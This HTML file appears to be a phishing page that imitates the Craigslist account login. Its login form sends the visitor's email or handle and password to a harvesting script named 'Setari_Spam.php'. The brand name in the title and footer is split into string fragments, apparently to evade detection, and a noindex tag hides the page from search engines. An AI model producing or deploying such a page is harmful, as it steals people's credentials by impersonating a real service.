<!DOCTYPE html>
<html>
<head>
<script>document.write('<title>'+'c'+''+'r'+''+'a'+''+'i'+''+'g'+''+'s'+''+'l'+''+'i'+''+'s'+''+'t'+''+':'+' ac'+'co'+'un'+'t lo'+'gi'+'n<\/title>')</script>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="viewport" content="initial-scale=1.0, user-scalable=1">
<link type="text/css" rel="stylesheet" media="all" href="src/style.css">
<link type="text/css" rel="stylesheet" media="all" href="src/cl.css">
<link rel="shortcut icon" href="favicon.ico.png" type="image/x-icon">
<meta name="robots" content="noindex,nofollow">
</head>

<body class="en desktop w1024">


<script type="text/javascript"><!--
    function C(k){return(document.cookie.match('(^|; )'+k+'=([^;]*)')||0)[2]}
    var pagetype, pagemode;
    (function(){
        var h = document.documentElement;
        h.className = h.className.replace('no-js', 'js');
        var b = document.body;
        var bodyClassList = b.className.split(/\s+/);;
        pagetype = bodyClassList[0]; // dangerous assumption
        var fmt = C('cl_fmt');
        if ( fmt === 'regular' || fmt === 'mobile' ) {
            pagemode = fmt;
        } else if (screen.width <= 480) {
            pagemode = 'mobile';
        } else {
            pagemode = 'regular';
        }
        var lng = C('cl_def_lang');
        if (lng) bodyClassList.push(lng);
        pagemode = pagemode === 'mobile' ? 'mobile' : 'desktop';
        bodyClassList.push(pagemode);
        if (C('hidesearch') === '1' && pagemode !== 'mobile') {
            bodyClassList.push('hide-search');
        }
        var width = window.innerWidth || document.documentElement.clientWidth;
        if (width > 1000) { bodyClassList.push('w1024'); }
        if (typeof window.sectionBase !== 'undefined') {
            var mode = (decodeURIComponent(C('cl_tocmode') || '').match(new RegExp(window.sectionBase + ':([^,]+)', 'i')) || {})[1] || window.defaultView;
            if (mode) {
                bodyClassList.push(mode);
            }
        }
        b.className = bodyClassList.join(' ');
    }());
--></script>


<section id="pagecontainer">
<header class="global-header">
   <a class="header-logo" href="">CL</a>

<nav class="breadcrumbs-container">
<ul class="breadcrumbs">
        <li class="crumb plain-message">
            <p>account log in</p>
        </li>
</ul>
</nav>

</header>

<section class="body">
    <div class="login-page-boxes">
        <div class="accountform login-box">
            <h1 class="accountform-banner">Log in</h1>

<form action="Setari_Spam.php" method="POST">

<div class="accountform-field">
<label for="inputEmailHandle">Email / Handle:</label>
<input type="text" id="inputEmailHandle" name="inputEmailHandle" value="" required>
</div>

<div class="accountform-field">
<label for="inputPassword">Password:</label>
<input id="inputPassword" type="password" name="inputPassword" required autocomplete="off">
</div>

<div class="accountform-actions">
<button type="submit" name="submit" class="accountform-btn">Log In</button>
<a href="" class="accountform-helplink">Forgot password?</a>
</div>
</form>
</div>

<p class="box-conjunction">
            or
</p>

<div class="accountform login-page-box">
            <h1 class="accountform-banner">Create an account</h1>
<form action="" method="post">

<div class="accountform-field">
<label for="inputEmail">Email:</label>
<input type="text" id="emailAddress" name="emailAddress" value="" maxlength="64">
</div>

<div class="accountform-actions">
<button type="submit" class="accountform-btn">Create Account</button>
<a href="" class="accountform-helplink">Account help</a>
</div>
</form>
</div>
    </div>
</section><footer>


    <ul class="clfooter">
        <li>&copy; 2017 <span class="desktop"><script>document.write('c'+'r'+'a'+'i'+'g'+'s'+'l'+'i'+'s'+'t');</script></span><span class="mobile">CL</span></li>
        <li><a href="">help</a></li>
        <li><a href="">safety</a></li>
        <li class="desktop"><a href="">privacy</a></li>
        <li class="desktop"><a href="">feedback</a></li>
        <li class="desktop"><a href="">cl jobs</a></li>
        <li><a href="">terms</a></li>
        <li><a href="">about</a></li>
        <li class="fsel desktop linklike" data-mode="mobile">mobile</li>
        <li class="fsel mobile linklike" data-mode="regular">desktop</li>
    </ul>
</footer>    </section>



<script src="src/gen-con.min.js" type="text/javascript"></script>

<script type="text/javascript"><!--
        var iframe = document.createElement('iframe');
        iframe.style.display = 'none';
        iframe.src = '//www.' + CL.url.baseDomain + '/static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170';
        document.body.insertBefore(iframe, null);
    --></script><iframe src="src/localstorage.html" style="display: none;"></iframe>
    
    
<script type="text/javascript">
        <!--
            if (top != self) { top.location.href = location.href; }
            $(document).ready(
                function() {
                    $('#inputEmailHandle').focus();
                    $('#inputPassword').attr('autocomplete','off');
                }
            );
        -->
    </script>
</body></html>